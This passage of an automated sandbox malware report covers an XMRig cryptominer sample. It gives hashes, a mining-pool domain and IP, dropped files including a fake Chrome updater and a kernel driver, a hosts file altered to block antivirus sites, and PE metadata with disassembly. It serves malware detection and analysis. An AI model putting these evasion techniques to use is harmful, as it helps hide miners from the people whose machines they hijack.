                                • Successful, ratio: 86.7%
                                HCA Information:Failed
                                Cookbook Comments:
                                • Found application associated with file extension: .exe

                                Warnings

                                • Exclude process from analysis (whitelisted): WmiPrvSE.exe
                                • Excluded IPs from analysis (whitelisted): 40.126.32.140, 40.126.32.138, 40.126.32.76, 20.190.160.14, 20.190.160.17, 40.126.32.133, 20.190.160.20, 20.190.160.22
                                • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                • Execution Graph export aborted for target file.exe, PID 6692 because it is empty
                                • Execution Graph export aborted for target updater.exe, PID 6792 because it is empty
                                • Not all processes where analyzed, report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                • Report size getting too big, too many NtCreateKey calls found.
                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                • VT rate limit hit for: file.exe

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                04:36:59API Interceptor1x Sleep call for process: file.exe modified
                                04:37:01API Interceptor33x Sleep call for process: powershell.exe modified
                                04:37:37API Interceptor489115x Sleep call for process: winlogon.exe modified
                                04:37:38API Interceptor386738x Sleep call for process: lsass.exe modified
                                04:37:39API Interceptor1362x Sleep call for process: svchost.exe modified
                                04:37:41API Interceptor467487x Sleep call for process: dwm.exe modified
                                04:37:43API Interceptor1874x Sleep call for process: dialer.exe modified

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                149.102.143.109file.exeGet hashmaliciousXmrigBrowse
                                  file.exeGet hashmaliciousXmrigBrowse
                                    MenSncKnTI.exeGet hashmaliciousXmrigBrowse
                                      SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeGet hashmaliciousXmrigBrowse

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        monerooceans.streamfile.exeGet hashmaliciousXmrigBrowse
                                        • 149.102.143.109
                                        file.exeGet hashmaliciousXmrigBrowse
                                        • 149.102.143.109
                                        MenSncKnTI.exeGet hashmaliciousXmrigBrowse
                                        • 149.102.143.109
                                        SecuriteInfo.com.Win32.Malware-gen.17013.17645.exeGet hashmaliciousXmrigBrowse
                                        • 149.102.143.109
                                        MDE_File_Sample_c7859a067082aa31648a9b8f2abd982c504dd0af.zipGet hashmaliciousXmrigBrowse
                                        • 44.196.193.227
                                        17ae2fbf36a41622374adfd3b1608e08.10.drGet hashmaliciousUnknownBrowse
                                        • 44.224.209.130
                                        SecuriteInfo.com.Win64.Evo-gen.32403.24162.exeGet hashmaliciousXmrigBrowse
                                        • 44.196.193.227
                                        GoogleCrashHandler.exeGet hashmaliciousXmrigBrowse
                                        • 44.196.193.227
                                        yljlbesdmoas.exeGet hashmaliciousXmrigBrowse
                                        • 44.196.193.227
                                        GoogleCrashHandler.exeGet hashmaliciousXmrigBrowse
                                        • 44.196.193.227

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        COGENT-174USDHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                        • 154.23.184.95
                                        ppc.elfGet hashmaliciousMiraiBrowse
                                        • 154.42.69.237
                                        mpsl.elfGet hashmaliciousMiraiBrowse
                                        • 38.116.142.107
                                        m68k.elfGet hashmaliciousMiraiBrowse
                                        • 38.139.147.165
                                        spc.elfGet hashmaliciousMiraiBrowse
                                        • 38.96.22.253
                                        mips.elfGet hashmaliciousMiraiBrowse
                                        • 38.165.211.175
                                        sh4.elfGet hashmaliciousMiraiBrowse
                                        • 204.157.239.7
                                        x86.elfGet hashmaliciousMiraiBrowse
                                        • 38.230.129.99
                                        linux_arm6.elfGet hashmaliciousChaosBrowse
                                        • 154.12.82.11
                                        nuklear.arm.elfGet hashmaliciousMirai, MoobotBrowse
                                        • 38.154.115.165

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        C:\Windows\Temp\jxhirqfmeznn.sysICBM.exeGet hashmaliciousXmrigBrowse
                                          ICBM.exeGet hashmaliciousXmrigBrowse
                                            ahlntQUj2t.exeGet hashmaliciousXmrigBrowse
                                              file.exeGet hashmaliciousXmrigBrowse
                                                ICBM.exeGet hashmaliciousXmrigBrowse
                                                  ICBM.exeGet hashmaliciousXmrigBrowse
                                                    ICBM.exeGet hashmaliciousXmrigBrowse
                                                      ICBM.exeGet hashmaliciousXmrigBrowse
                                                        HmA7s2gaa5.exeGet hashmaliciousXmrigBrowse
                                                          SaxP2rle4l.exeGet hashmaliciousXmrigBrowse

                                                            Created / dropped Files

                                                            C:\ProgramData\Google\Chrome\updater.exe

                                                            Download File
                                                            Process:C:\Users\user\Desktop\file.exe
                                                            File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):5511168
                                                            Entropy (8bit):6.5408750151969794
                                                            Encrypted:false
                                                            SSDEEP:98304:MmWSpnQNESCZFPABbU7sfPbB3w5N0tql9QvqdNGsrySNe1bydKDMv7KKxM:MmPptSCZFPABg7Yb9uCu95DGoNrnzKKx
                                                            MD5:FB788C569D7B0ACF5546340AA85CD0A6
                                                            SHA1:DCBF06332153A462E67E27C74929AF46A5A83D39
                                                            SHA-256:D6787107B40D3D9C65B07AEA10E10FA14FF04EFBB497B6CAF5854812D8E7648B
                                                            SHA-512:0F2B1F5A2D2134DEDB6B0CBC72243AD9E0947EA4523EB2D2E848FAE9096F84C6BFCC43FFFA257412CBE363BDB535344E619E28C90601784606F915CE939DECD0
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                            Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d...L.)g.........."......"....R.....@..........@..............................T...........`..................................................v..<.....T......`T...............T.x............................@..(....D..8............w..x............................text...V!.......".................. ..`.rdata...=...@...>...&..............@..@.data.....R.......R..d..............@....pdata.......`T.......T.............@..@.00cfg.......pT.......T.............@..@.tls..........T.......T.............@....rsrc.........T.......T.............@..@.reloc..x.....T.......T.............@..B........................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\AppData\Local\Microsoft\Vault\UserProfileRoaming\Latest.dat

                                                            Download File
                                                            Process:C:\Windows\System32\lsass.exe
                                                            File Type:very short file (no magic)
                                                            Category:modified
                                                            Size (bytes):1
                                                            Entropy (8bit):0.0
                                                            Encrypted:false
                                                            SSDEEP:3::
                                                            MD5:93B885ADFE0DA089CDF634904FD59F71
                                                            SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                            SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                            SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                            Malicious:false
                                                            Preview:.

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):1.1940658735648508
                                                            Encrypted:false
                                                            SSDEEP:3:Nlllul/nq/llh:NllUyt
                                                            MD5:AB80AD9A08E5B16132325DF5584B2CBE
                                                            SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                                                            SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                                                            SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                                                            Malicious:false
                                                            Preview:@...e................................................@..........

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3kg2jj43.3lw.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fiopesf5.dnm.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k05rqf55.pg4.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zo4qjz1e.rp2.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Windows\System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask

                                                            Download File
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):4680
                                                            Entropy (8bit):3.711361374646048
                                                            Encrypted:false
                                                            SSDEEP:96:pYMguQII4i46h4aGdinipV9ll7UY5HAmzQ+:9A4o/xne7HO+
                                                            MD5:3ED17AE74370A242AF8BAB4EC70C7B36
                                                            SHA1:751AB462E80E14061ECE93F28F8AAA0063E5C292
                                                            SHA-256:EA3B67BBEAAF625B151A5D2AF08D0E467AA6B59085C44033FBE3FD2F48D942BE
                                                            SHA-512:72E242AD282800813106F8392D452F7477557B58AA7E072313F29BB242C7BA2FBFE2C340F9EE3564A6A5BAA7F066328760E36FA8C27F3EAB40E3BF96F5789263
                                                            Malicious:false
                                                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.T.a.s.k. .v.e.r.s.i.o.n.=.".1...6.". .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n.d.o.w.s./.2.0.0.4./.0.2./.m.i.t./.t.a.s.k.".>..... . .<.R.e.g.i.s.t.r.a.t.i.o.n.I.n.f.o.>..... . . . .<.S.o.u.r.c.e.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.S.o.u.r.c.e.>..... . . . .<.A.u.t.h.o.r.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.0.).<./.A.u.t.h.o.r.>..... . . . .<.V.e.r.s.i.o.n.>.1...0.<./.V.e.r.s.i.o.n.>..... . . . .<.D.e.s.c.r.i.p.t.i.o.n.>.$.(.@.%.s.y.s.t.e.m.r.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.p.p.c...d.l.l.,.-.2.0.1.).<./.D.e.s.c.r.i.p.t.i.o.n.>..... . . . .<.U.R.I.>.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.S.o.f.t.w.a.r.e.P.r.o.t.e.c.t.i.o.n.P.l.a.t.f.o.r.m.\.S.v.c.R.e.s.t.a.r.t.T.a.s.k.<./.U.R.I.>..... . . . .<.S.e.c.u.r.i.t.y.D.e.s.c.r.i.p.t.o.r.>.D.:.P.(.A.;.;.F.A.;.;.;.S.Y.).(.A.;.;.F.A.;.;.;.B.A.).

                                                            C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):64
                                                            Entropy (8bit):1.1510207563435464
                                                            Encrypted:false
                                                            SSDEEP:3:NlllulpvZ:NllUp
                                                            MD5:2CF7A616011ED21EE4739A0EEF5EEED8
                                                            SHA1:B8920F93FE146ED266A180393DD79273ABEDBE4C
                                                            SHA-256:6760CDB1723A97A5CC4DBDBCEA1FAFD58D52FB573FF113B60B59942E87FE89B6
                                                            SHA-512:C1F9F65566CC37C46F9BB416B9199E0B9D1BC778B56772908F7B4638AC560640DABDAC1DDCB38A5D85D91E3AA25BEEAB1F4F4A531F244E83ABF91895CA73079D
                                                            Malicious:false
                                                            Preview:@...e................................................@..........

                                                            C:\Windows\System32\drivers\etc\hosts

                                                            Download File
                                                            Process:C:\Users\user\Desktop\file.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):2748
                                                            Entropy (8bit):4.269302338623222
                                                            Encrypted:false
                                                            SSDEEP:48:vDZhyoZWM9rU5fFcDL6iCW1RiJ9rn5w0K:vDZEurK9XiCW1RiXn54
                                                            MD5:7B1D6A1E1228728A16B66C3714AA9A23
                                                            SHA1:8B59677A3560777593B1FA7D67465BBD7B3BC548
                                                            SHA-256:3F15965D0159A818849134B3FBB016E858AC50EFDF67BFCD762606AC51831BC5
                                                            SHA-512:573B68C9865416EA2F9CF5C614FCEDBFE69C67BD572BACEC81C1756E711BD90FCFEE93E17B74FB294756ADF67AD18845A56C87F7F870940CBAEB3A579146A3B6
                                                            Malicious:true
                                                            Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.scanguard.com..

                                                            C:\Windows\Temp\__PSScriptPolicyTest_3oxd4h1z.fw0.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Windows\Temp\__PSScriptPolicyTest_abowbhme.34k.ps1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Windows\Temp\__PSScriptPolicyTest_ckobzoqb.y23.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Windows\Temp\__PSScriptPolicyTest_j5q1ix3s.f3s.psm1

                                                            Download File
                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                            C:\Windows\Temp\jxhirqfmeznn.sys

                                                            Download File
                                                            Process:C:\ProgramData\Google\Chrome\updater.exe
                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):14544
                                                            Entropy (8bit):6.2660301556221185
                                                            Encrypted:false
                                                            SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                            MD5:0C0195C48B6B8582FA6F6373032118DA
                                                            SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                            SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                            SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                            Joe Sandbox View:
                                                            • Filename: ICBM.exe, Detection: malicious, Browse
                                                            • Filename: ICBM.exe, Detection: malicious, Browse
                                                            • Filename: ahlntQUj2t.exe, Detection: malicious, Browse
                                                            • Filename: file.exe, Detection: malicious, Browse
                                                            • Filename: ICBM.exe, Detection: malicious, Browse
                                                            • Filename: ICBM.exe, Detection: malicious, Browse
                                                            • Filename: ICBM.exe, Detection: malicious, Browse
                                                            • Filename: ICBM.exe, Detection: malicious, Browse
                                                            • Filename: HmA7s2gaa5.exe, Detection: malicious, Browse
                                                            • Filename: SaxP2rle4l.exe, Detection: malicious, Browse
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                            Static File Info

                                                            General

                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                            Entropy (8bit):6.5408750151969794
                                                            TrID:
                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                            • DOS Executable Generic (2002/1) 0.92%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:file.exe
                                                            File size:5'511'168 bytes
                                                            MD5:fb788c569d7b0acf5546340aa85cd0a6
                                                            SHA1:dcbf06332153a462e67e27c74929af46a5a83d39
                                                            SHA256:d6787107b40d3d9c65b07aea10e10fa14ff04efbb497b6caf5854812d8e7648b
                                                            SHA512:0f2b1f5a2d2134dedb6b0cbc72243ad9e0947ea4523eb2d2e848fae9096f84c6bfcc43fffa257412cbe363bdb535344e619e28c90601784606f915ce939decd0
                                                            SSDEEP:98304:MmWSpnQNESCZFPABbU7sfPbB3w5N0tql9QvqdNGsrySNe1bydKDMv7KKxM:MmPptSCZFPABg7Yb9uCu95DGoNrnzKKx
                                                            TLSH:BA4623D231697F7CD8936DF8AC08A236C0E3617D97BC23957C688535D862E881D3397A
                                                            File Content Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d...L.)g.........."......"....R.....@..........@..............................T...........`........................................

                                                            File Icon

                                                            Icon Hash:90cececece8e8eb0

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x140001140
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x140000000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x6729C44C [Tue Nov 5 07:07:56 2024 UTC]
                                                            TLS Callbacks:0x40001760, 0x1, 0x400017e0, 0x1
                                                            CLR (.Net) Version:
                                                            OS Version Major:6
                                                            OS Version Minor:0
                                                            File Version Major:6
                                                            File Version Minor:0
                                                            Subsystem Version Major:6
                                                            Subsystem Version Minor:0
                                                            Import Hash:b237ac2118704db9e7609540658f5790

                                                            Entrypoint Preview

                                                            Instruction
                                                            dec eax
                                                            sub esp, 28h
                                                            dec eax
                                                            mov eax, dword ptr [00012ED5h]
                                                            mov dword ptr [eax], 00000001h
                                                            call 00007F4004CA30AFh
                                                            nop
                                                            nop
                                                            nop
                                                            dec eax
                                                            add esp, 28h
                                                            ret
                                                            nop
                                                            inc ecx
                                                            push edi
                                                            inc ecx
                                                            push esi
                                                            push esi
                                                            push edi
                                                            push ebx
                                                            dec eax
                                                            sub esp, 20h
                                                            dec eax
                                                            mov eax, dword ptr [00000030h]
                                                            dec eax
                                                            mov edi, dword ptr [eax+08h]
                                                            dec eax
                                                            mov esi, dword ptr [00012EC9h]
                                                            xor eax, eax
                                                            dec eax
                                                            cmpxchg dword ptr [esi], edi
                                                            sete bl
                                                            je 00007F4004CA30D0h
                                                            dec eax
                                                            cmp edi, eax
                                                            je 00007F4004CA30CBh
                                                            dec esp
                                                            mov esi, dword ptr [00016779h]
                                                            nop word ptr [eax+eax+00000000h]
                                                            mov ecx, 000003E8h
                                                            inc ecx
                                                            call esi
                                                            xor eax, eax
                                                            dec eax
                                                            cmpxchg dword ptr [esi], edi
                                                            sete bl
                                                            je 00007F4004CA30A7h
                                                            dec eax
                                                            cmp edi, eax
                                                            jne 00007F4004CA3089h
                                                            dec eax
                                                            mov edi, dword ptr [00012E90h]
                                                            mov eax, dword ptr [edi]
                                                            cmp eax, 01h
                                                            jne 00007F4004CA30AEh
                                                            mov ecx, 0000001Fh
                                                            call 00007F4004CB4E64h
                                                            jmp 00007F4004CA30C9h
                                                            cmp dword ptr [edi], 00000000h
                                                            je 00007F4004CA30ABh
                                                            mov byte ptr [00541531h], 00000001h
                                                            jmp 00007F4004CA30BBh
                                                            mov dword ptr [edi], 00000001h
                                                            dec eax
                                                            mov ecx, dword ptr [00012E7Ah]
                                                            dec eax
                                                            mov edx, dword ptr [00012E7Bh]
                                                            call 00007F4004CB4E5Bh
                                                            mov eax, dword ptr [edi]
                                                            cmp eax, 01h
                                                            jne 00007F4004CA30BBh
                                                            dec eax
                                                            mov ecx, dword ptr [00012E50h]

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x176080x3c.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x5490000x390.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x5460000x198.pdata
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x54a0000x78.reloc
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x140a00x28.rdata
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x144100x138.rdata
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x177c00x178.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x121560x122006377790a0c479e542049c6368ae704f9False0.4525053879310345data6.176862580587811IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x140000x3dfc0x3e0083ac305b6a96aa94897a04049bb8ba85False0.5096396169354839data5.132348642661844IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0x180000x52d4b80x52a80003a5c7073619ce02d1bd18f9ec32f256unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
